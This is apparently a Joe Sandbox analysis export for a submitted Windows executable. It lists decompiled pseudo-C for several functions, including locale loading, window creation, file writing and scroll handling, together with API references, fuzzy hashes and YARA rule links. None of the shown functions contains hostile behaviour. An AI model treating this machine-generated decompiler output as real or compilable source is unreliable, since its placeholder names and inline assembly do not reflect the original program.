Part of subcall function 0044FF24: 6D2B5CA0.KERNEL32(00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000,00000002,00000000), ref: 0044FF7D

Part of subcall function 0045023C: WriteFile.KERNEL32(?,?,00000000,00450496,00000000,00000000,?,?,?,00450496,00000000,00452595,?,0048B23D,00000000,00452636), ref: 00450253

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: File$BuffersFlushWrite
String ID:
API String ID: 1012034594-0
Opcode ID: de8fda2d95f50b4884014379d4ceac5cbcd03f56e2aa0340912cb38c5927129d
Instruction ID: 98f95fac580508a0606152e77f4bbd63eac633614977a46270456582b705ae86
Opcode Fuzzy Hash: de8fda2d95f50b4884014379d4ceac5cbcd03f56e2aa0340912cb38c5927129d
Instruction Fuzzy Hash: A7519334A002589BDB21DF25CC41ADAB3B5BB48305F1084EBA94DE7782DB74AEC9CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0047308C Relevance: 1.6, APIs: 1, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0047308C(long __eax, void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t16;
				intOrPtr _t17;
				void* _t22;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t43;
				intOrPtr _t47;
				intOrPtr _t51;
				int _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t75;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				void* _t93;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				long _t103;
				void* _t106;

				_t71 = __ecx;
				_t16 = __eax;
				_t103 = __eax;
				_t106 = _t103 -  *0x48cb08; // 0x0
				if(_t106 == 0) {
					L22:
					return _t16;
				}
				_t17 =  *0x4ae1c4; // 0x21d2a4c
				_t69 = E0040B654(_t17, __eax);
				_push(E004036BC( *((intOrPtr*)(_t69 + 0x18))));
				_t2 = _t69 + 0x18; // 0x18
				_t22 = E0040388C(_t2);
				_pop(_t75);
				E00450D04(_t22, _t71, _t75);
				 *0x48cb08 = _t103;
				E00403C08(0x4ae184, _t69, 0x430d54, _t93, _t98);
				_t99 = _t69;
				memcpy(0x4ae184, _t99, 0x10 << 2);
				_t4 = _t99 + 0x20 - 0x40; // 0x4ae144
				E00403C14(_t4, 0x430d54);
				if( *((intOrPtr*)(_t69 + 0x1c)) == 0) {
					_t78 =  *0x4ae094; // 0x21e4b50
					E00403598(0x4ae214, _t69, _t78, _t96, _t99);
				} else {
					E00403598(0x4ae214, _t69,  *((intOrPtr*)(_t69 + 0x1c)), _t96, _t99);
				}
				if( *((intOrPtr*)(_t69 + 0x20)) == 0) {
					_t79 =  *0x4ae098; // 0x0
					E00403598(0x4ae218, _t69, _t79, _t96, _t99);
				} else {
					E00403598(0x4ae218, _t69,  *((intOrPtr*)(_t69 + 0x20)), _t96, _t99);
				}
				_t109 =  *((intOrPtr*)(_t69 + 0x24));
				if( *((intOrPtr*)(_t69 + 0x24)) == 0) {
					_t80 =  *0x4ae09c; // 0x0
					E00403598(0x4ae21c, _t69, _t80, _t96, _t99);
				} else {
					E00403598(0x4ae21c, _t69,  *((intOrPtr*)(_t69 + 0x24)), _t96, _t99);
				}
				_t35 =  *0x48dcd8; // 0x21ea4ac
				E0042EA38(0, 0, E00403880(_t35), _t109);
				_t39 =  *0x48dbf4; // 0x21e9474
				E0042EA38(1, 0, E00403880(_t39), _t109);
				_t43 =  *0x48dc80; // 0x21e9cb0
				E0042EA38(2, 0, E00403880(_t43), _t109);
				_t47 =  *0x48dc80; // 0x21e9cb0
				E0042EA38(3, 0, E00403880(_t47), _t109);
				_t85 =  *0x48ddc0; // 0x21eb5b8
				_t51 =  *0x48d628; // 0x21d2410
				E004244DC(_t51, _t85, _t96);
				_t16 =  *0x4ae1d0; // 0x21d2a88
				_t101 =  *((intOrPtr*)(_t16 + 8)) - 1;
				if(_t101 < 0) {
					L20:
					if( *0x4adf94 == 0) {
						goto L22;
					}
					_t54 = SendNotifyMessageA( *0x4adf98, 0x496, 0x2711, _t103); // executed
					return _t54;
				} else {
					_t102 = _t101 + 1;
					_t97 = 0;
					do {
						_t55 =  *0x4ae1d0; // 0x21d2a88
						_t70 = E0040B654(_t55, _t97);
						_t58 =  *((intOrPtr*)(_t70 + 0x25)) - 1;
						if(_t58 == 0) {
							_t13 = _t70 + 4; // 0x4
							_t87 =  *0x48dcbc; // 0x21ea2e8
							_t16 = E00403598(_t13, _t70, _t87, _t97, _t102);
						} else {
							_t60 = _t58 - 1;
							if(_t60 == 0) {
								_t14 = _t70 + 4; // 0x4
								_t88 =  *0x48dbdc; // 0x21e9260
								_t16 = E00403598(_t14, _t70, _t88, _t97, _t102);
							} else {
								_t16 = _t60 - 1;
								if(_t16 == 0) {
									_t15 = _t70 + 4; // 0x4
									_t89 =  *0x48dbfc; // 0x21e94e0
									_t16 = E00403598(_t15, _t70, _t89, _t97, _t102);
								}
							}
						}
						_t97 = _t97 + 1;
						_t102 = _t102 - 1;
					} while (_t102 != 0);
					goto L20;
				}
			}

0x0047308c
0x0047308c
0x00473090
0x00473092
0x00473098
0x00473242
0x00473242
0x00473242
0x004730a0
0x004730aa
0x004730b4
0x004730b5
0x004730b8
0x004730bd
0x004730be
0x004730c3
0x004730d3
0x004730d8
0x004730e4
0x004730e6
0x004730ee
0x004730f7
0x0047310d
0x00473113
0x004730f9
0x00473101
0x00473101
0x0047311c
0x00473132
0x00473138
0x0047311e
0x00473126
0x00473126
0x0047313d
0x00473141
0x00473157
0x0047315d
0x00473143
0x0047314b
0x0047314b
0x00473162
0x00473170
0x00473175
0x00473183
0x00473188
0x00473196
0x0047319b
0x004731a9
0x004731ae
0x004731b4
0x004731b9
0x004731be
0x004731c6
0x004731c9
0x0047321f
0x00473226
0x00000000
0x00000000
0x00473239
0x00000000
0x004731cb
0x004731cb
0x004731cc
0x004731ce
0x004731d0
0x004731da
0x004731df
0x004731e1
0x004731ed
0x004731f0
0x004731f6
0x004731e3
0x004731e3
0x004731e5
0x004731fd
0x00473200
0x00473206
0x004731e7
0x004731e7
0x004731e9
0x0047320d
0x00473210
0x00473216
0x00473216
0x004731e9
0x004731e5
0x0047321b
0x0047321c
0x0047321c
0x00000000
0x004731ce

APIs

SendNotifyMessageA.USER32(?,00000496,00002711,00000000), ref: 00473239

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: MessageNotifySend
String ID:
API String ID: 3556456075-0
Opcode ID: 9ab252c7df4a3371be67c19622f9384f871a42459bdec4ebf624354283c3477d
Instruction ID: d9d9b5a362be0b11c7760159c5e68fdaa49a9a0ccb77dac42abb28a5527d8e81
Opcode Fuzzy Hash: 9ab252c7df4a3371be67c19622f9384f871a42459bdec4ebf624354283c3477d
Instruction Fuzzy Hash: B841A5317011009BC700FF67DC8194A7B95EB4630AB90C5BBE8189B3A6CA39DE46D79D

Uniqueness

Uniqueness Score: -1.00%

Function 004087C0 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004087C0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				char _v16;
				char _v20;
				void* _t76;
				void* _t77;
				intOrPtr _t103;
				void* _t106;
				void* _t107;
				void* _t109;
				void* _t110;
				void* _t113;

				_v16 = 0;
				_v20 = 0;
				_push(_t113);
				_push(0x4088f6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffff0;
				_v12 = GetSystemDefaultLCID();
				_t76 = 1;
				_t109 = 0x48d4c0;
				_t106 = 0x48d4f0;
				do {
					_t6 = _t76 + 0xffbf; // 0xffc0
					E00406E88(_t6,  &_v20);
					_t8 = _t76 + 0x44; // 0x45
					E0040874C(_v12, _v20, _t8 - 1,  &_v16); // executed
					E00403598(_t109, _t76, _v16, _t106, _t109);
					_t13 = _t76 + 0xffcf; // 0xffd0
					E00406E88(_t13,  &_v20);
					_t15 = _t76 + 0x38; // 0x39
					E0040874C(_v12, _v20, _t15 - 1,  &_v16);
					E00403598(_t106, _t76, _v16, _t106, _t109);
					_t76 = _t76 + 1;
					_t106 = _t106 + 4;
					_t109 = _t109 + 4;
				} while (_t76 != 0xd);
				_t77 = 1;
				_t110 = 0x48d520;
				_t107 = 0x48d53c;
				do {
					_t18 = _t77 + 5; // 0x6
					asm("cdq");
					_v8 = _t18 % 7;
					_t26 = _t77 + 0xffdf; // 0xffe0
					E00406E88(_t26,  &_v20);
					E0040874C(_v12, _v20, _v8 + 0x31,  &_v16);
					E00403598(_t110, _t77, _v16, _t107, _t110);
					_t33 = _t77 + 0xffe6; // 0xffe7
					E00406E88(_t33,  &_v20);
					E0040874C(_v12, _v20, _v8 + 0x2a,  &_v16);
					E00403598(_t107, _t77, _v16, _t107, _t110);
					_t77 = _t77 + 1;
					_t107 = _t107 + 4;
					_t110 = _t110 + 4;
				} while (_t77 != 8);
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E004088FD);
				return E00403568( &_v20, 2);
			}

0x004087cb
0x004087ce
0x004087d3
0x004087d4
0x004087d9
0x004087dc
0x004087e4
0x004087e7
0x004087ec
0x004087f1
0x004087f6
0x004087fd
0x00408803
0x0040880b
0x00408812
0x0040881c
0x00408828
0x0040882e
0x00408836
0x0040883d
0x00408847
0x0040884c
0x0040884d
0x00408850
0x00408853
0x00408858
0x0040885d
0x00408862
0x00408867
0x00408867
0x0040886f
0x00408872
0x0040887c
0x00408882
0x00408893
0x0040889d
0x004088a9
0x004088af
0x004088c0
0x004088ca
0x004088cf
0x004088d0
0x004088d3
0x004088d6
0x004088dd
0x004088e0
0x004088e3
0x004088f5

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004088F6), ref: 004087DF

Part of subcall function 00406E88: LoadStringA.USER32 ref: 00406EA5

Part of subcall function 0040874C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,00408817,?,00000000,004088F6), ref: 0040876A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 1c1894150776b90865854070815ef66849cb364d8f97ba9b26649f05d9b49282
Instruction ID: 2f8ba864ab96db97f6cf17ed82080221b0fae122bfefd17694dcc9a968476761
Opcode Fuzzy Hash: 1c1894150776b90865854070815ef66849cb364d8f97ba9b26649f05d9b49282
Instruction Fuzzy Hash: 53313235E01109ABCB00EF95CC819DEB779EF85314F518577EC19B7286E738AE068B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041FDB4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041FDB4(void* __eax, char __ecx, void* __edx) {
				struct tagSCROLLINFO _v44;
				intOrPtr _t28;
				void* _t40;
				void* _t48;
				signed short _t49;
				intOrPtr _t51;

				_t52 =  &(_v44.nMax);
				_v44.nMax = __ecx;
				_t40 = __edx;
				_t48 = __eax;
				 *((intOrPtr*)(__eax + 0x14)) = 0;
				_t49 = 0;
				if( *((char*)(__eax + 0x18)) == 1) {
					_t49 = 1;
				}
				if( *((char*)(_t48 + 0x1c)) != 0) {
					_t51 =  *((intOrPtr*)(_t48 + 0x10)) - E0041FB54(_t48,  *_t52, _t40);
					 *((intOrPtr*)(_t48 + 0x14)) = _t51;
					if(_t51 < 0) {
						 *((intOrPtr*)(_t48 + 0x14)) = 0;
					}
				}
				_v44.cbSize = 0x1c;
				_v44.fMask = 0x17;
				_v44.nMin = 0;
				if( *((intOrPtr*)(_t48 + 0x14)) <= 0) {
					_v44.nMax = 0;
				} else {
					_v44.nMax =  *((intOrPtr*)(_t48 + 0x10));
				}
				_v44.nPage = E0041FB54(_t48,  *_t52, _t40) + 1;
				_t28 =  *((intOrPtr*)(_t48 + 0xc));
				_v44.nPos = _t28;
				_v44.nTrackPos = _t28;
				SetScrollInfo(E004183F8( *((intOrPtr*)(_t48 + 4))), _t49 & 0x0000ffff,  &_v44, 1); // executed
				return E0041FCB4(_t48,  *((intOrPtr*)(_t48 + 0xc)));
			}

0x0041fdb8
0x0041fdbb
0x0041fdbe
0x0041fdc0
0x0041fdc4
0x0041fdc7
0x0041fdcd
0x0041fdcf
0x0041fdcf
0x0041fdd7
0x0041fde8
0x0041fdea
0x0041fdef
0x0041fdf3
0x0041fdf3
0x0041fdef
0x0041fdf6
0x0041fdfe
0x0041fe08
0x0041fe10
0x0041fe1d
0x0041fe12
0x0041fe15
0x0041fe15
0x0041fe2e
0x0041fe32
0x0041fe35
0x0041fe39
0x0041fe51
0x0041fe67

APIs

SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FE51

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: 888ad13662f13ad0bd03ed50b7689cab4f24634a29ce09f20c02b28e3daba57a
Instruction ID: e540092da8e7da3dae8bd1b2a92eb4b6159312edffabb0d8bcf6d17393f85037
Opcode Fuzzy Hash: 888ad13662f13ad0bd03ed50b7689cab4f24634a29ce09f20c02b28e3daba57a
Instruction Fuzzy Hash: D82142B1608745AFC340DF7994406A7BBE4BB48304F14493EE498C3741E778E99ACBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0044FF24 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E0044FF24(void* __ecx, void* __edx, void* _a4, void* _a8, void* _a12) {
				void* __ebp;
				intOrPtr* _t13;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t32;
				void* _t33;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;
				void* _t39;

				_t34 = __edx;
				_t33 = __ecx;
				if(__edx != 0) {
					_t39 = _t39 + 0xfffffff0;
					_t13 = E00402E78(_t13, _t38);
				}
				_t32 = _t34;
				_t36 = _t13;
				E00402C78(0);
				_push(0);
				_push(0x80);
				_push( *0x0048C9E0);
				_push(0);
				_push( *0x0048C9D0);
				_push( *0x0048C9C4);
				_t26 = E00403880(_t33);
				_push(_t26); // executed
				L00405964(); // executed
				 *((intOrPtr*)(_t36 + 4)) = _t26;
				_t11 = _t36 + 4; // 0x69465405
				_t27 =  *_t11;
				if(_t27 == 0 || _t27 + 1 == 0) {
					E00450118( *_t36);
				}
				 *((char*)(_t36 + 8)) = 1;
				if(_t32 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t36;
			}

0x0044ff24
0x0044ff24
0x0044ff2c
0x0044ff2e
0x0044ff31
0x0044ff31
0x0044ff38
0x0044ff3a
0x0044ff40
0x0044ff45
0x0044ff47
0x0044ff58
0x0044ff59
0x0044ff67
0x0044ff74
0x0044ff77
0x0044ff7c
0x0044ff7d
0x0044ff82
0x0044ff85
0x0044ff85
0x0044ff8a
0x0044ff91
0x0044ff91
0x0044ff96
0x0044ff9c
0x0044ff9e
0x0044ffa5
0x0044ffae

APIs

6D2B5CA0.KERNEL32(00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000,00000002,00000000), ref: 0044FF7D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f04b9bdfdb98c96e06be34f4ab8b1ccad4c40d697cc44ee9932cb28ff6ba2adc
Instruction ID: 2e2a120d147de6d94c72ad5ffc2ae7c715d885b5015c71d5a04a7e90ff779685
Opcode Fuzzy Hash: f04b9bdfdb98c96e06be34f4ab8b1ccad4c40d697cc44ee9932cb28ff6ba2adc
Instruction Fuzzy Hash: A90128B23005446BD310DB7D9C41F6B77C89B4A354F088137F898D7381DA75D81887A8

Uniqueness

Uniqueness Score: -1.00%

Function 004415B4 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 004415CB

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction ID: 9f8cf82f4584f97632556d285df67e84eae5bfbe1e2ca16854b8ddf6377e1a6f
Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction Fuzzy Hash: 7DF01D74605109FBEF1CCF58E1A19EF7BA1EB99310B60806FE507C73A0D634AE80D659

Uniqueness

Uniqueness Score: -1.00%

Function 00416768 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416768(void* __eax, CHAR** __edx) {
				struct HINSTANCE__* _t13;
				struct HWND__* _t23;
				void* _t26;

				_t26 = __eax;
				_t13 =  *0x48d014; // 0x400000
				_t23 = CreateWindowExA(__edx[2],  &(__edx[0x13]),  *__edx, __edx[1], __edx[3], __edx[4], __edx[5], __edx[6], __edx[7], 0, _t13, __edx[8]); // executed
				 *(_t26 + 0xc0) = _t23;
				return _t23;
			}

0x0041676c
0x00416772
0x0041679d
0x004167a2
0x004167aa

APIs

CreateWindowExA.USER32 ref: 0041679D

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 795260cd6bd7fdc1189ff6fc4d2ff421b563323c442d0d232bced7d330843685
Instruction ID: 6c3ef091721d5a05e3f25395159bc42e2463a2ee5bd90214379e7bac883b3513
Opcode Fuzzy Hash: 795260cd6bd7fdc1189ff6fc4d2ff421b563323c442d0d232bced7d330843685
Instruction Fuzzy Hash: F5F025B2601510AFDB84CF9CD8C0F9773ECEB0C210B0885A6FA08CF24AD224EC108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00414BCC Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00414BCC(intOrPtr* __eax, void* __edx) {
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _t31;

				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *__eax + 0x2c))();
				_push( *((intOrPtr*)(__eax + 0x2c)) - _v20 +  *_t31);
				_push( *((intOrPtr*)(__eax + 0x30)) - _v16 + _v32);
				return  *((intOrPtr*)( *__eax + 0x4c))();
			}

0x00414bd7
0x00414bd8
0x00414be3
0x00414bf0
0x00414bfc
0x00414c10

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 00414C07

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0045023C Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0045023C(intOrPtr* __eax, long __ecx, void* __edx, void* __ebp) {
				long _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t6;
				intOrPtr* _t9;
				long _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t14 = __edx;
				_t9 = __eax;
				_t6 = WriteFile( *(__eax + 4), __edx, __ecx,  &_v16, 0); // executed
				if(_t6 == 0) {
					_t6 = E00450118( *_t9);
				}
				if(_t15 != _v16) {
					_t6 = E00450078(_t9, 0x1d, _t14, _t15);
				}
				return _t6;
			}

0x0045023f
0x00450240
0x00450242
0x00450244
0x00450253
0x0045025a
0x0045025e
0x0045025e
0x00450266
0x0045026f
0x0045026f
0x00450278

APIs

WriteFile.KERNEL32(?,?,00000000,00450496,00000000,00000000,?,?,?,00450496,00000000,00452595,?,0048B23D,00000000,00452636), ref: 00450253

Part of subcall function 00450118: GetLastError.KERNEL32(00000001,0044FF96,00000000,?,00000000,00000000,?,00000080,00000000,?,00000000,?,?,0048A596,00000001,00000000), ref: 0045011B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 2842ea7bc6511e8c2d718eef324573f67b024011173ce29c9fd7847b3f6ba579
Instruction ID: 674aa04627b62e24b29d3ef8bf19d0357b5f18529ded2054958fda780b13fd42
Opcode Fuzzy Hash: 2842ea7bc6511e8c2d718eef324573f67b024011173ce29c9fd7847b3f6ba579
Instruction Fuzzy Hash: D4E092767041106BDB20E65AD884F6B67DCCF85751F00407BB904CB216CA649C088775

Uniqueness

Uniqueness Score: -1.00%

Function 0042CDBC Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E0042CDBC(char* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t20;
				intOrPtr _t25;

				_push(0);
				_push(_t25);
				_push(0x42ce04);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E0042CC98(__eax, __ecx,  &_v8, __eflags);
				_push(E00403880(_v8)); // executed
				L00405A54(); // executed
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(E0042CE0B);
				return E00403548( &_v8);
			}

0x0042cdbf
0x0042cdc8
0x0042cdc9
0x0042cdce
0x0042cdd1
0x0042cdd9
0x0042cde6
0x0042cde7
0x0042cdf0
0x0042cdf3
0x0042cdf6
0x0042ce03

APIs

Part of subcall function 0042CC98: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CDDE,00000000,0042CE04,?,?,?,00000000,00000000,?,0042CE19), ref: 0042CCC0

6D7478A0.KERNEL32(00000000,00000000,0042CE04,?,?,?,00000000,00000000,?,0042CE19,00450DCB,00000000), ref: 0042CDE7

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CharD7478Prev
String ID:
API String ID: 2808809543-0
Opcode ID: 727180b66f65586923329090a688826150c1f9f6a2f6490c16fa3cb47dd6e8bb
Instruction ID: da92d61eb6b352902b1c215b0369a352a3cb5dd7ef3dec75437e06d4da21b6e5
Opcode Fuzzy Hash: 727180b66f65586923329090a688826150c1f9f6a2f6490c16fa3cb47dd6e8bb
Instruction Fuzzy Hash: 0EE06D71304304BBD711EE62DC92E5EBBACDB49B14BA2487AB400E3691E6786E0485A8

Uniqueness

Uniqueness Score: -1.00%

Function 004063FC Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063FC(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
				struct HWND__* _t10;

				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				return _t10;
			}

0x00406425
0x0040642c

APIs

CreateWindowExA.USER32 ref: 00406425

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

